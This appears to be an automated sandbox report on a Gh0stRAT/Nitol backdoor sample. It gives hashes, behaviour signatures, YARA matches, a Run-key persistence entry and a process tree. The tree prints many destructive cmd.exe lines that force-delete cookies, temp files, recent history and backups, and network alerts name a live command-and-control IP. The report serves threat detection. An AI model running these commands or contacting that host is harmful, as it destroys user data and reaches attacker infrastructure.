Windows Analysis Report
G3izWAY3Fa.exe

Overview

General Information

Sample name: G3izWAY3Fa.exe (renamed because original name is a hash value)
Original sample name: 118F7F61B6AFB1DA5E94EA1740222C73.exe
Analysis ID: 1579781
MD5: 118f7f61b6afb1da5e94ea1740222c73
SHA1: 5a0d66ec18cdb3812bad259999cf64d051cefa8b
SHA256: aaf88339c23080ffd423da3b03a229d220b55c5e007c1f413fbd3633c48aad44
Tags: exe, Gh0stRAT, user-abuse_ch

Detection

GhostRat, Nitol
Score: 78
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected GhostRat
Yara detected Nitol
AI detected suspicious sample
Checks if browser processes are running
Contains functionality to detect virtual machines
Contains functionality to capture and log keystrokes
Contains functionality to detect sleep reduction / modifications
Contains functionality to detect virtual machines (IN, VMware)
Contains functionality to enumerate network shares of other devices
Deletes itself after installation
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
Machine Learning detection for dropped file
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates processes with suspicious names
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries keyboard layouts
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Too many similar processes found
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • G3izWAY3Fa.exe (PID: 7620 cmdline: "C:\Users\user\Desktop\G3izWAY3Fa.exe" MD5: 118F7F61B6AFB1DA5E94EA1740222C73)
    • v5.exe (PID: 7696 cmdline: "C:\Windows\temp\v5.exe" MD5: 48A02F4A003E8CBE683CF5DADA237168)
      • cmd.exe (PID: 7820 cmdline: "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nul MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • server.exe (PID: 7708 cmdline: "C:\Windows\temp\server.exe" MD5: 8A953A49796B7F8C7539A6B2BC175397)
    • .exe (PID: 7740 cmdline: "C:\Windows\temp\ .exe" MD5: CCEE0912E79D434F0D2C1E11274F23C0)
      • cmd.exe (PID: 8060 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8076 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8100 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8140 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8188 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7252 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2716 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4220 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7800 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7764 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7788 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7640 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7692 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1912 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3556 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1528 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3360 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3124 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3108 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3248 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5508 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4436 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7672 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4680 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7276 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6492 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7336 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2804 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5808 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5440 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5244 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6556 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5308 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5972 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8164 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5356 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6216 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6700 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7004 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8056 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5652 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2052 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1868 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3376 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7836 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3600 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6996 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1604 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • v5.exe (PID: 7720 cmdline: C:\Windows\temp\v5.exe MD5: 48A02F4A003E8CBE683CF5DADA237168)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security
dump.pcap | gh0st | unknown | https://github.com/jackcr/
  • 0x3a2d1:$a: 47 68 30 73 74 A7 00 00 00 18 01 00 00 78 9C
  • 0x3d203:$a: 47 68 30 73 74 16 00 00 00 01 00 00 00 78 9C

Source | Rule | Description | Author | Strings
00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp | JoeSecurity_Nitol | Yara detected Nitol | Joe Security
00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Nitol | Yara detected Nitol | Joe Security
00000003.00000002.3339534621.0000000001FD0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security
00000003.00000002.3339534621.0000000001FD0000.00000004.00001000.00020000.00000000.sdmp | gh0st | unknown | https://github.com/jackcr/
  • 0x0:$a: 47 68 30 73 74 A7 00 00 00 18 01 00 00 78 9C
00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp | JoeSecurity_Nitol | Yara detected Nitol | Joe Security

Source | Rule | Description | Author | Strings
4.2.v5.exe.400000.0.unpack | JoeSecurity_Nitol | Yara detected Nitol | Joe Security
4.2.v5.exe.400000.0.unpack | Backdoor_Nitol_Jun17 | Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader | Florian Roth
  • 0x1e13:$x1: User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
  • 0x1eb0:$x1: User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
  • 0x203b:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
  • 0x21a3:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
  • 0x1b60:$s2: %c%c%c%c%c%c.exe
  • 0x2003:$s5: Accept-Language: zh-cn
  • 0x216b:$s5: Accept-Language: zh-cn
  • 0x22cf:$s5: Accept-Language: zh-cn
4.2.v5.exe.400000.0.unpack | ZxShell_Related_Malware_CN_Group_Jul17_2 | Detects a ZxShell related sample from a CN threat group | Florian Roth
  • 0x1e13:$u1: User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
  • 0x1eb0:$u1: User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
  • 0x203b:$u2: User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
  • 0x21a3:$u2: User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
  • 0x1cf0:$u3: User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0
  • 0x2307:$u4: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
  • 0x172c:$x1: \\%s\admin$\g1fd.exe
  • 0x1764:$x2: C:\g1fd.exe
  • 0x174c:$x3: \\%s\C$\NewArean.exe
  • 0x17d0:$s0: at \\%s %d:%d %s
  • 0x19f0:$s1: %c%c%c%c%ccn.exe
  • 0x1a58:$s1: %c%c%c%c%ccn.exe
  • 0x1ad4:$s1: %c%c%c%c%ccn.exe
  • 0x1970:$s2: hra%u.dll
  • 0x1b20:$s2: hra%u.dll
  • 0x1b54:$s2: hra%u.dll
  • 0x1d61:$s3: Referer: http://%s:80/http://%s
  • 0x2003:$s5: Accept-Language: zh-cn
  • 0x216b:$s5: Accept-Language: zh-cn
  • 0x22cf:$s5: Accept-Language: zh-cn
4.2.v5.exe.400000.0.unpack | CN_disclosed_20180208_Mal1 | Detects malware from disclosed CN malware set | Florian Roth
  • 0x2307:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
4.2.v5.exe.400000.0.unpack | MAL_Nitol_Malware_Jan19_1 | Detects Nitol Malware | Florian Roth
  • 0x239c:$xc2: GET ^&&%$%$^
  • 0x23cd:$xc2: GET ^&&%$%$^
  • 0x23fe:$xc2: GET ^&&%$%$^
  • 0x242f:$xc2: GET ^&&%$%$^
  • 0x2460:$xc2: GET ^&&%$%$^
  • 0x2491:$xc2: GET ^&&%$%$^
  • 0x24c2:$xc2: GET ^&&%$%$^
  • 0x24f3:$xc2: GET ^&&%$%$^
  • 0x2524:$xc2: GET ^&&%$%$^
  • 0x2555:$xc2: GET ^&&%$%$^
  • 0x2586:$xc2: GET ^&&%$%$^
  • 0x25b7:$xc2: GET ^&&%$%$^
  • 0x25e8:$xc2: GET ^&&%$%$^
  • 0x2619:$xc2: GET ^&&%$%$^
  • 0x264a:$xc2: GET ^&&%$%$^
  • 0x267b:$xc2: GET ^&&%$%$^
  • 0x26ac:$xc2: GET ^&&%$%$^
  • 0x26dd:$xc2: GET ^&&%$%$^
  • 0x270e:$xc2: GET ^&&%$%$^
  • 0x273f:$xc2: GET ^&&%$%$^
  • 0x23c9:$n1: .htmGET

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\temp\ .exe" , CommandLine: "C:\Windows\temp\ .exe" , CommandLine|base64offset|contains: , Image: C:\Windows\Temp\ .exe, NewProcessName: C:\Windows\Temp\ .exe, OriginalFileName: C:\Windows\Temp\ .exe, ParentCommandLine: "C:\Users\user\Desktop\G3izWAY3Fa.exe", ParentImage: C:\Users\user\Desktop\G3izWAY3Fa.exe, ParentProcessId: 7620, ParentProcessName: G3izWAY3Fa.exe, ProcessCommandLine: "C:\Windows\temp\ .exe" , ProcessId: 7740, ProcessName: .exe
Source: Network Connection | Author: Florian Roth (Nextron Systems) | Data: DestinationIp: 120.48.34.233, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Windows\Temp\v5.exe, Initiated: true, ProcessId: 7720, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49723
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Windows\XXXXXX05CA35CC\svchsot.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Temp\server.exe, ProcessId: 7708, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\XXXXXX05CA35CC
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-23T09:13:17.322358+0100 | 2016922 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49717 | 120.48.34.233 | 8000 | TCP
